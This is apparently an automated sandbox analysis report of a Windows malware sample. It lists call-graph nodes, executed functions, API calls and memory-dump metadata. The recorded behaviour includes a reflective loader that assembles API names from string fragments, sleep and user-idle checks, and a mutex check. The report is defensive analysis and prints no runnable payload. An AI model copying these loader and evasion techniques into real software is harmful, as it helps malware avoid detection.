6c2f5d2f 144622->144623 144624 6c2f5d34 144622->144624 144636 6c300cc4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 144623->144636 144628 6c2f5c2e 144624->144628 144627 6c2f5d42 144629 6c2f5c3a __getstream 144628->144629 144633 6c2f5cd7 __getstream 144629->144633 144634 6c2f5c87 ___DllMainCRTStartup 144629->144634 144637 6c2f5aca 144629->144637 144631 6c2f5cb7 144632 6c2f5aca ___DllMainCRTStartup 140 API calls 144631->144632 144631->144633 144632->144633 144633->144627 144634->144631 144634->144633 144635 6c2f5aca ___DllMainCRTStartup 140 API calls 144634->144635 144635->144631 144636->144624 144638 6c2f5ad6 __getstream 144637->144638 144639 6c2f5ade 144638->144639 144640 6c2f5b58 144638->144640 144687 6c2fe3bd HeapCreate 144639->144687 144641 6c2f5b5e 144640->144641 144642 6c2f5bb9 144640->144642 144647 6c2f5b7c 144641->144647 144656 6c2f5ae7 __getstream 144641->144656 144697 6c2f2e5f 62 API calls _doexit 144641->144697 144645 6c2f5bbe 144642->144645 144646 6c2f5c17 144642->144646 144644 6c2f5ae3 144648 6c2f5aee 144644->144648 144644->144656 144701 6c2f8faa TlsGetValue TlsSetValue 144645->144701 144646->144656 144705 6c2f92ae 74 API calls __freefls@4 144646->144705 144654 6c2f5b90 144647->144654 144698 6c2f779b 63 API calls _free 144647->144698 144688 6c2f9328 79 API calls 5 library calls 144648->144688 144650 6c2f5bc3 144702 6c2f7abf 62 API calls _calloc 144650->144702 144700 6c2f5ba3 TlsFree __mtterm 144654->144700 144656->144634 144657 6c2f5af3 __RTC_Initialize 144660 6c2f5af7 144657->144660 144665 6c2f5b03 GetCommandLineA 144657->144665 144689 6c2fe3db HeapDestroy 144660->144689 144661 6c2f5b86 144699 6c2f8ffb TlsFree 144661->144699 144664 6c2f5afc 144664->144656 144690 6c300a9d 67 API calls 2 library calls 144665->144690 144669 6c2f5b13 144691 6c2f7556 69 API calls __calloc_crt 144669->144691 144670 6c2f5bcf 144670->144656 144672 6c2f5c0b 144670->144672 144673 6c2f5bf4 144670->144673 144704 6c2f355f 62 API calls 2 library calls 144672->144704 144703 6c2f9038 62 API calls 4 library calls 144673->144703 144674 6c2f5b1d 144677 6c2f5b21 144674->144677 144693 6c3009e2 91 API calls 3 library calls 144674->144693 144692 6c2f8ffb TlsFree 144677->144692 144679 6c2f5bfb GetCurrentThreadId 144679->144656 144681 6c2f5b2d 144682 6c2f5b41 144681->144682 144694 6c30075d 90 API calls 6 library calls 144681->144694 144682->144664 144696 6c2f779b 63 API calls _free 144682->144696 144685 6c2f5b36 144685->144682 144695 6c2f2c5c 73 API calls 4 library calls 144685->144695 144687->144644 144688->144657 144689->144664 144690->144669 144691->144674 144693->144681 144694->144685 144695->144682 144696->144677 144697->144647 144698->144661 144700->144656 144701->144650 144702->144670 144703->144679 144704->144664 144705->144656 144706 6c27338c 144728 6c31734c 144706->144728 144708 6c273398 CreateMutexA 144709 6c2733b1 GetLastError 144708->144709 144710 6c2733ab 144708->144710 144709->144710 144712 6c2733be 144709->144712 144729 6c2f2e33 144710->144729 144732 6c300ff1 144712->144732 144714 6c2733d6 144735 6c27329d GetModuleFileNameA 144714->144735 144716 6c2733fb 144716->144716 144717 6c273417 CreateThread CreateFileA GetFileSize 144716->144717 144737 6c2f1f6a 144717->144737 144779 6c27334b 144717->144779 144719 6c27346a ReadFile 144720 6c273491 FindCloseChangeNotification 144719->144720 144721 6c273481 CloseHandle 144719->144721 144723 6c2f1f6a 78 API calls 144720->144723 144722 6c273490 144721->144722 144722->144720 144724 6c2734a3 _memmove 144723->144724 144725 6c2734ba HeapCreate RtlAllocateHeap 144724->144725 144753 6c30e020 144725->144753 144728->144708 144755 6c2f2cf3 62 API calls 6 library calls 144729->144755 144731 6c2f2e44 144731->144709 144733 6c301026 KiUserExceptionDispatcher 144732->144733 144734 6c30101a 144732->144734 144733->144714 144734->144733 144736 6c2732b5 __cftoa_l 144735->144736 144736->144716 144740 6c2f5dbc _malloc 144737->144740 144739 6c2f5de0 144739->144719 144740->144739 144741 6c2f5de2 std::exception::exception 144740->144741 144756 6c2f37d0 144740->144756 144742 6c2f5e20 144741->144742 144770 6c2fb484 72 API calls __cinit 144741->144770 144771 6c300f00 62 API calls std::exception::operator= 144742->144771 144744 6c2f5e2a 144746 6c300ff1 __CxxThrowException@8 KiUserExceptionDispatcher 144744->144746 144747 6c2f5e3b IsDebuggerPresent 144746->144747 144772 6c30103d 144747->144772 144750 6c2f5f09 SetUnhandledExceptionFilter UnhandledExceptionFilter 144751 6c2f5f2e GetCurrentProcess TerminateProcess 144750->144751 144752 6c2f5f26 __call_reportfault 144750->144752 144751->144719 144752->144751 144754 6c2734e1 GetDC EnumObjects 144753->144754 144755->144731 144757 6c2f384d _malloc 144756->144757 144761 6c2f37de _malloc 144756->144761 144778 6c2f6fbc 62 API calls __getptd_noexit 144757->144778 144760 6c2f380c RtlAllocateHeap 144760->144761 144769 6c2f3845 144760->144769 144761->144760 144763 6c2f3839 144761->144763 144766 6c2f37e9 144761->144766 144767 6c2f3837 144761->144767 144776 6c2f6fbc 62 API calls __getptd_noexit 144763->144776 144766->144761 144773 6c2fb831 62 API calls 2 library calls 144766->144773 144774 6c2fb682 62 API calls 7 library calls 144766->144774 144775 6c2f2b5e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 144766->144775 144777 6c2f6fbc 62 API calls __getptd_noexit 144767->144777 144769->144740 144770->144742 144771->144744 144772->144750 144773->144766 144774->144766 144776->144767 144777->144769 144778->144769 144785 6c2732f1 RegisterClassA CreateWindowExA 144779->144785 144781 6c273358 144782 6c273376 GetMessageA 144781->144782 144783 6c273383 144782->144783 144784 6c273362 TranslateMessage DispatchMessageA 144782->144784 144784->144782 144785->144781 144786 6c273ffb 144787 6c27400a __EH_prolog3_catch_GS 144786->144787 144793 6c273021 144787->144793 144791 6c27401b 144822 6c2914fc 112 API calls 4 library calls 144791->144822 144794 6c27303b __flsbuf _memset 144793->144794 144795 6c2730c7 GetModuleFileNameA 144794->144795 144796 6c27313b 144795->144796 144796->144796 144797 6c2f1f75 __write_nolock 5 API calls 144796->144797 144798 6c273175 144797->144798 144799 6c294afa 144798->144799 144800 6c294b2e 144799->144800 144801 6c294b26 144799->144801 144805 6c294b82 144800->144805 144844 6c2f2a1f 77 API calls 5 library calls 144800->144844 144823 6c2947b5 144801->144823 144804 6c294b48 144845 6c2f2220 64 API calls 4 library calls 144804->144845 144807 6c2f1f75 __write_nolock 5 API calls 144805->144807 144809 6c294c05 144807->144809 144808 6c294b54 144810 6c294b5c 144808->144810 144816 6c294b84 144808->144816 144809->144791 144811 6c2f1f84 _sprintf 98 API calls 144810->144811 144813 6c294b74 144811->144813 144846 6c2917c6 99 API calls 2 library calls 144813->144846 144815 6c294b9d 144849 6c2f3b76 62 API calls __write_nolock 144815->144849 144816->144815 144847 6c2f3b76 62 API calls __write_nolock 144816->144847 144848 6c2f2a1f 77 API calls 5 library calls 144816->144848 144820 6c294ba3 144820->144805 144850 6c2f3b76 62 API calls __write_nolock 144820->144850 144851 6c2f2a1f 77 API calls 5 library calls 144820->144851 144822->144791 144824 6c2947e5 144823->144824 144825 6c2f1f84 _sprintf 98 API calls 144824->144825 144826 6c2947ff 144825->144826 144827 6c294a8f 144826->144827 144828 6c2f1f84 _sprintf 98 API calls 144826->144828 144829 6c294ac0 144826->144829 144841 6c2f24fa 139 API calls 144826->144841 144842 6c2f330e 95 API calls __wgetenv 144826->144842 144843 6c2f1f84 98 API calls _sprintf 144826->144843 144827->144829 144830 6c294a93 144827->144830 144832 6c29484b GetModuleFileNameA 144828->144832 144831 6c294abe 144829->144831 144833 6c2f1f84 _sprintf 98 API calls 144829->144833 144830->144831 144835 6c2f1f84 _sprintf 98 API calls 144830->144835 144834 6c2f1f75 __write_nolock 5 API calls 144831->144834 144832->144826 144836 6c294ae0 144833->144836 144837 6c294af8 144834->144837 144838 6c294ab0 144835->144838 144853 6c2f28b7 98 API calls 5 library calls 144836->144853 144837->144800 144852 6c291814 99 API calls 2 library calls 144838->144852 144841->144826 144842->144826 144843->144826 144844->144804 144845->144808 144846->144805 144847->144816 144848->144816 144849->144820 144850->144820 144851->144820 144852->144831 144853->144831 144854 6c2b5835 144857 6c2b5840 144854->144857 144855 6c2f1f75 __write_nolock 5 API calls 144856 6c2b6653 144855->144856 144858 6c2b5950 144857->144858 144859 6c2b5b85 144857->144859 144891 6c2b586f 144857->144891 144877 6c2b5963 144858->144877 144927 6c2b7969 146 API calls __write_nolock 144858->144927 144860 6c2b5b8f 144859->144860 144861 6c2b5ce6 144859->144861 144862 6c2b5b9b 144860->144862 144863 6c2b6597 144860->144863 144861->144863 144884 6c2b5d3b 144861->144884 144868 6c2b5bde 144862->144868 144869 6c2b5c1a 144862->144869 144931 6c2c1275 146 API calls 2 library calls 144862->144931 144863->144891 144952 6c2b6ed9 146 API calls 144863->144952 144865 6c2b7458 145 API calls 144882 6c2b596a 144865->144882 144866 6c2b5972 144866->144891 144930 6c2bb5d7 146 API calls __write_nolock 144866->144930 144868->144869 144932 6c2b045b 146 API calls 2 library calls 144868->144932 144872 6c2b7458 145 API calls 144869->144872 144878 6c2b5c8f 144869->144878 144872->144878 144873 6c2b5b36 144873->144891 144929 6c2b3d23 98 API calls 2 library calls 144873->144929 144876 6c2b5c05 144876->144869 144879 6c2b5cd6 144876->144879 144877->144865 144877->144882 144877->144891 144878->144891 144933 6c2bbacb 145 API calls __write_nolock 144878->144933 144934 6c2b13bf 98 API calls 2 library calls 144879->144934 144882->144866 144882->144891 144928 6c2b157b 98 API calls 2 library calls 144882->144928 144885 6c2b5e5f 144884->144885 144886 6c2b5d44 144884->144886 144887 6c2b5e68 144885->144887 144888 6c2b5f53 144885->144888 144886->144891 144935 6c2b2d37 98 API calls 2 library calls 144886->144935 144887->144891 144938 6c2b2f12 98 API calls 2 library calls 144887->144938 144889 6c2b5f58 144888->144889 144890 6c2b5fc5 144888->144890 144889->144891 144941 6c2bd768 146 API calls 2 library calls 144889->144941 144893 6c2b5fca 144890->144893 144894 6c2b600d 144890->144894 144891->144855 144893->144891 144942 6c2bd768 146 API calls 2 library calls 144893->144942 144894->144891 144902 6c2b604d 144894->144902 144909 6c2b607f 144894->144909 144895 6c2b5d7f 144895->144891 144936 6c2b2d37 98 API calls 2 library calls 144895->144936 144900 6c2b5ea1 144900->144891 144939 6c2b2f12 98 API calls 2 library calls 144900->144939 144943 6c2be5a0 145 API calls 2 library calls 144902->144943 144903 6c2b60fb 144944 6c2be5a0 145 API calls 2 library calls 144903->144944 144905 6c2f1f84 _sprintf 98 API calls 144905->144909 144907 6c2b5da8 144907->144891 144937 6c2bbc0b 145 API calls __write_nolock 144907->144937 144909->144891 144909->144903 144909->144905 144912 6c2b6189 144909->144912 144924 6c2b63fd 144909->144924 144910 6c2b5ecc 144910->144891 144940 6c2bbc0b 145 API calls __write_nolock 144910->144940 144913 6c2b62ee 144912->144913 144914 6c2b619d 144912->144914 144913->144891 144917 6c2f1f84 _sprintf 98 API calls 144913->144917 144945 6c2b6ed9 146 API calls 144914->144945 144917->144891 144918 6c2b61c7 144946 6c2b4554 145 API calls 144918->144946 144920 6c2b7cc1 145 API calls 144920->144924 144924->144891 144924->144920 144950 6c2b8689 146 API calls __write_nolock 144924->144950 144951 6c2b6ed9 146 API calls 144924->144951 144925 6c2b61fa 144925->144891 144947 6c2ba095 146 API calls __write_nolock 144925->144947 144948 6c2b6ed9 146 API calls 144925->144948 144949 6c2b4554 145 API calls 144925->144949 144927->144877 144928->144873 144929->144866 144930->144891 144931->144868 144932->144876 144933->144891 144934->144891 144935->144895 144936->144907 144937->144891 144938->144900 144939->144910 144940->144891 144941->144891 144942->144891 144943->144891 144944->144891 144945->144918 144946->144925 144947->144925 144948->144925 144949->144925 144950->144924 144951->144924 144952->144891 144953 32f2051 144965 32f2b31 GetPEB 144953->144965 144956 32f2b31 GetPEB 144958 32f22c6 144956->144958 144957 32f2afe 144958->144957 144959 32f24ba GetNativeSystemInfo 144958->144959 144959->144957 144960 32f24e7 VirtualAlloc 144959->144960 144962 32f2500 144960->144962 144961 32f2818 LdrGetProcedureAddress 144961->144962 144962->144961 144963 32f2866 144962->144963 144963->144957 144963->144963 144967 1000f100 144963->144967 144966 32f22ba 144965->144966 144966->144956 144968 1000f10b 144967->144968 144970 1000f12d error_info_injector 144967->144970 144968->144970 144972 1000f15d 144968->144972 145022 1000ffb0 24 API calls error_info_injector 144970->145022 144971 1000f155 144971->144957 145017 100414c7 144972->145017 144974 1000f162 144975 100425aa 25 API calls 144974->144975 144976 1000f1ae 144975->144976 144977 10041738 36 API calls 144976->144977 144978 1000f1b4 144977->144978 144979 1000eac0 60 API calls 144978->144979 145016 1000f212 error_info_injector 144979->145016 144980 1000fd00 144981 1000f100 213 API calls 144980->144981 144982 1000fd0b 144981->144982 144984 10038bd3 CatchGuardHandler SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144982->144984 144983 1000a360 25 API calls 144983->145016 144985 1000fd22 144984->144985 144985->144957 144986 10010270 25 API calls 144986->145016 144987 10012620 25 API calls 144987->145016 144988 1000c1c0 131 API calls 144988->145016 144989 1000fd26 144990 100414c7 24 API calls 144989->144990 144991 1000fd2b GetModuleFileNameA 144990->144991 144992 1000fd60 144991->144992 144992->144992 144995 10009e90 25 API calls 144992->144995 144993 1000f401 Sleep 144994 1000f412 144993->144994 144998 1000f000 98 API calls 144994->144998 144994->145016 144997 1000fd7b 144995->144997 144996 1000f59a GetLastInputInfo 144996->145016 144999 1000dbd0 213 API calls 144997->144999 144998->144994 145001 1000fd80 144999->145001 145000 1001ce10 73 API calls 145000->145016 145002 1000fd84 6 API calls 145001->145002 145003 1000fdfb 145001->145003 145002->145003 145041 10020310 SetEvent 145002->145041 145004 10038bd3 CatchGuardHandler SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 145003->145004 145006 1000fe0a 145004->145006 145005 1000ab10 67 API calls 145005->145016 145006->144957 145007 10009e90 25 API calls 145007->145016 145008 1001bc50 27 API calls 145008->145016 145009 1000b9d0 29 API calls 145009->145016 145010 10013ec0 42 API calls 145010->145016 145011 100101a0 25 API calls 145011->145016 145012 10011a00 93 API calls 145012->145016 145013 10041717 36 API calls 145013->145016 145014 1000f000 98 API calls 145014->145016 145015 1000fcd8 Sleep 145015->145016 145016->144980 145016->144983 145016->144986 145016->144987 145016->144988 145016->144989 145016->144993 145016->144996 145016->145000 145016->145005 145016->145007 145016->145008 145016->145009 145016->145010 145016->145011 145016->145012 145016->145013 145016->145014 145016->145015 145023 10041453 24 API calls 3 library calls 145017->145023 145019 100414d6 145024 100414e4 IsProcessorFeaturePresent 145019->145024 145021 100414e3 145022->144971 145023->145019 145025 100414f0 145024->145025 145028 10041309 145025->145028 145029 10041325 ___scrt_fastfail 145028->145029 145030 10041351 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 145029->145030 145031 10041422 ___scrt_fastfail 145030->145031 145034 10038bd3 145031->145034 145033 10041440 GetCurrentProcess TerminateProcess 145033->145021 145035 10038bdc 145034->145035 145036 10038bde 145034->145036 145035->145033 145037 10038c5e 145036->145037 145040 10038c22 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 145037->145040 145039 10038d41 145039->145033 145040->145039 145042 10020378 145041->145042 145043 1002037d 145041->145043 145047 10020580 6 API calls 145042->145047 145046 1000f100 222 API calls 145043->145046 145045 10020383 145046->145045 145047->145043

                                Executed Functions

                                Function 032F2051 Relevance: 72.6, APIs: 3, Strings: 38, Instructions: 811memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetNativeSystemInfo.KERNEL32(?), ref: 032F24C2
                                • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 032F24F2
                                • LdrGetProcedureAddress.NTDLL(00000000,?,00000000,?), ref: 032F2819
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressAllocInfoNativeProcedureSystemVirtual
                                • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                • API String ID: 2811151940-2899676511
                                • Opcode ID: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                • Instruction ID: bada95baccce7944c411b339518f6db7ad40afe306a3bbb48dde1ce1355389c4
                                • Opcode Fuzzy Hash: 15b3c3a1d8b5dafea4a93bb4805a509b4eeb6b1eaca912e0ae13e9403863b76d
                                • Instruction Fuzzy Hash: 09627939518386CFD725CF24C840BABF7E5BF86304F184D2DEA898B251E7709989CB56
                                Function 6C2B5835 Relevance: 30.8, APIs: 2, Strings: 15, Instructions: 1038COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID:
                                • String ID: using Moshier eph.; $ trying Swiss Eph; $ using Moshier Eph; $ using Moshier eph.; $.;C:\Astrolog\$Chiron's ephemeris is restricted to JD %8.1f - JD %8.1f$Interpolated apsides are restricted to JD %8.1f - JD %8.1f$Pholus's ephemeris is restricted to JD %8.1f - JD %8.1f$`9l$`9l$barycentric Moshier positions are not supported.$de431.eph$illegal planet number %d.$sun: $x9l
                                • API String ID: 0-2661965930
                                • Opcode ID: e99ddf23409d36ed9ddd0da90a3fc215137930d0d3ddcd1632390766d19bd4d5
                                • Instruction ID: a6086faafbcfdc12ecabb3a45cb408340bb3bc0e50d0d637b720d61d6f1cbeb2
                                • Opcode Fuzzy Hash: e99ddf23409d36ed9ddd0da90a3fc215137930d0d3ddcd1632390766d19bd4d5
                                • Instruction Fuzzy Hash: A182137190460EDADF189F24D880BD97B70FB4A3ADF1446A5FDA8B69C0DB3189A4CF41
                                Function 1000F100 Relevance: 21.9, APIs: 10, Strings: 2, Instructions: 918sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(0001D4C0,?,00000000,?), ref: 1000F406
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883591978.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_10001000_33MwVPy.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID: `$https://
                                • API String ID: 3472027048-3356742408
                                • Opcode ID: 8bdf530b9ea3ced8279571d6625b001ddbfa3540c5801337f33a91fe9c71cf8c
                                • Instruction ID: d66631ddc7739b2df91dca4a1cd6bdde61ed29147cda0506061661c4489d8bb2
                                • Opcode Fuzzy Hash: 8bdf530b9ea3ced8279571d6625b001ddbfa3540c5801337f33a91fe9c71cf8c
                                • Instruction Fuzzy Hash: 3482E471D00258DFEB54CB64CC85BEDBBB2EF45344F10829CE049AB695DB78AB84CB61
                                Function 6C271112 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 237COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1557 6c271112-6c271121 call 6c2f24fa 1560 6c271123-6c27114c call 6c2f1f84 call 6c291814 call 6c2f2289 1557->1560 1561 6c271151-6c27115d 1557->1561 1560->1561 1562 6c2711d6-6c2711da 1561->1562 1563 6c27115f-6c271165 1561->1563 1566 6c2711e0-6c2711e6 1562->1566 1563->1562 1565 6c271167-6c271175 call 6c2f2289 1563->1565 1565->1562 1577 6c271177-6c27119a 1565->1577 1568 6c2711f8-6c27120a call 6c271009 1566->1568 1569 6c2711e8-6c2711f1 1566->1569 1578 6c27120f-6c271222 call 6c291ad3 1568->1578 1569->1568 1573 6c2711f3 call 6c2714a4 1569->1573 1573->1568 1580 6c2711a6-6c2711b4 call 6c2914fc 1577->1580 1581 6c27119c-6c2711a1 call 6c2914fc 1577->1581 1588 6c271224-6c271237 1578->1588 1589 6c271238-6c27123e 1578->1589 1592 6c2711b6-6c2711bb call 6c2914fc 1580->1592 1593 6c2711c0-6c2711d4 call 6c2914fc 1580->1593 1581->1580 1588->1589 1590 6c271254-6c27125a 1589->1590 1591 6c271240-6c271253 1589->1591 1595 6c27127e-6c271285 call 6c27f780 1590->1595 1596 6c27125c-6c27127b call 6c2fedb0 * 2 1590->1596 1591->1590 1592->1593 1593->1566 1604 6c27140b-6c27141a 1595->1604 1605 6c27128b-6c271291 1595->1605 1596->1595 1609 6c271433-6c271437 1604->1609 1610 6c27141c-6c271422 1604->1610 1607 6c2712a3-6c2712aa 1605->1607 1608 6c271293-6c27129d call 6c2914fc 1605->1608 1614 6c2712ac-6c2712f7 call 6c277259 call 6c277313 1607->1614 1615 6c2712f9 1607->1615 1608->1607 1611 6c27146d-6c271473 1609->1611 1612 6c271439-6c271451 call 6c2914fc 1609->1612 1610->1609 1616 6c271424-6c27142e call 6c2914fc 1610->1616 1622 6c271475 call 6c294c0a 1611->1622 1623 6c27147a-6c271489 call 6c2f2289 1611->1623 1635 6c271453-6c271458 call 6c2914fc 1612->1635 1636 6c27145d-6c271467 call 6c2914fc 1612->1636 1617 6c2712fe-6c271304 1614->1617 1615->1617 1616->1566 1624 6c271306-6c27130d 1617->1624 1625 6c27131a-6c27132a 1617->1625 1622->1623 1638 6c271492-6c2714a3 call 6c2f1f75 1623->1638 1639 6c27148b-6c271491 call 6c2f28b7 1623->1639 1624->1625 1632 6c27130f-6c271311 1624->1632 1633 6c271344 call 6c286e7c 1625->1633 1634 6c27132c-6c271332 1625->1634 1632->1625 1640 6c271313-6c271319 call 6c29070e 1632->1640 1650 6c271349-6c27134f 1633->1650 1643 6c271334-6c27133a 1634->1643 1644 6c27133c-6c271342 1634->1644 1635->1636 1636->1611 1639->1638 1640->1625 1643->1644 1643->1650 1644->1650 1655 6c271351-6c271356 call 6c2f174a 1650->1655 1656 6c27135b-6c271361 1650->1656 1663 6c2713ef-6c2713f5 1655->1663 1657 6c2713a3-6c2713b5 call 6c285698 1656->1657 1658 6c271363-6c27139e call 6c291ad3 1656->1658 1657->1663 1665 6c2713b7-6c2713ea 1657->1665 1658->1657 1663->1604 1666 6c2713f7-6c2713fe 1663->1666 1665->1663 1666->1604 1667 6c271400-6c271402 1666->1667 1667->1604 1668 6c271404-6c27140a call 6c29070e 1667->1668 1668->1604
                                APIs
                                  • Part of subcall function 6C2F24FA: __fsopen.LIBCMT ref: 6C2F2507
                                • _sprintf.LIBCMT ref: 6C271133
                                  • Part of subcall function 6C291814: _sprintf.LIBCMT ref: 6C29183B
                                  • Part of subcall function 6C291814: MessageBoxA.USER32(?,?,00000030), ref: 6C291850
                                • _memset.LIBCMT ref: 6C271265
                                • _memset.LIBCMT ref: 6C271276
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C3A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883992161.000000006C3A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6c270000_33MwVPy.jbxd
                                Similarity
                                • API ID: _memset_sprintf$Message__fsopen
                                • String ID: <!--EndFragment-->$<!--StartFragment -->$ p6l$</body></html>$</font></font>$<font face="Courier">$<html><body>$File %s can not be created.$Version:0.9StartHTML:00000094EndHTML:00010000StartFragment:00000129EndFragment:00010000
                                • API String ID: 2973518034-1860017026
                                • Opcode ID: 1f1d3cc4a408885b51f60535c46c5427ce1aedf1e7bd30512639f4f0d6e29b51
                                • Instruction ID: c21c70d30231167e92813b361510da6e166d7a0585df9988b151693bd2ae22ff
                                • Opcode Fuzzy Hash: 1f1d3cc4a408885b51f60535c46c5427ce1aedf1e7bd30512639f4f0d6e29b51
                                • Instruction Fuzzy Hash: 01919B75A0724BDBDF10DF69C4E185473B9AB8B319711053BEA298BE40D7B4D884CFA2
                                Function 6C2F1F6A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • _malloc.LIBCMT ref: 6C2F5DD6
                                  • Part of subcall function 6C2F37D0: __FF_MSGBANNER.LIBCMT ref: 6C2F37E9
                                  • Part of subcall function 6C2F37D0: __NMSG_WRITE.LIBCMT ref: 6C2F37F0
                                  • Part of subcall function 6C2F37D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C2F7A8B,?,00000001,?,?,6C2F7F4A,00000018,6C362E78,0000000C,6C2F7FDA), ref: 6C2F3815
                                • std::exception::exception.LIBCMT ref: 6C2F5E0B
                                • std::exception::exception.LIBCMT ref: 6C2F5E25
                                • __CxxThrowException@8.LIBCMT ref: 6C2F5E36
                                • IsDebuggerPresent.KERNEL32 ref: 6C2F5EF7
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C2F5F0C
                                • UnhandledExceptionFilter.KERNEL32(6C31FF84), ref: 6C2F5F17
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 6C2F5F33
                                • TerminateProcess.KERNEL32(00000000), ref: 6C2F5F3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883695684.000000006C271000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C270000, based on PE: true
                                • Associated: 00000006.00000002.3883679260.000000006C270000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883794677.000000006C367000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883816323.000000006C369000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883845237.000000006C38D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883872112.000000006C38E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C390000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C393000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C398000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                • Associated: 00000006.00000002.3883888941.000000006C39C000.00000004.00000001.01000000.0000000B.sdmpDownload File
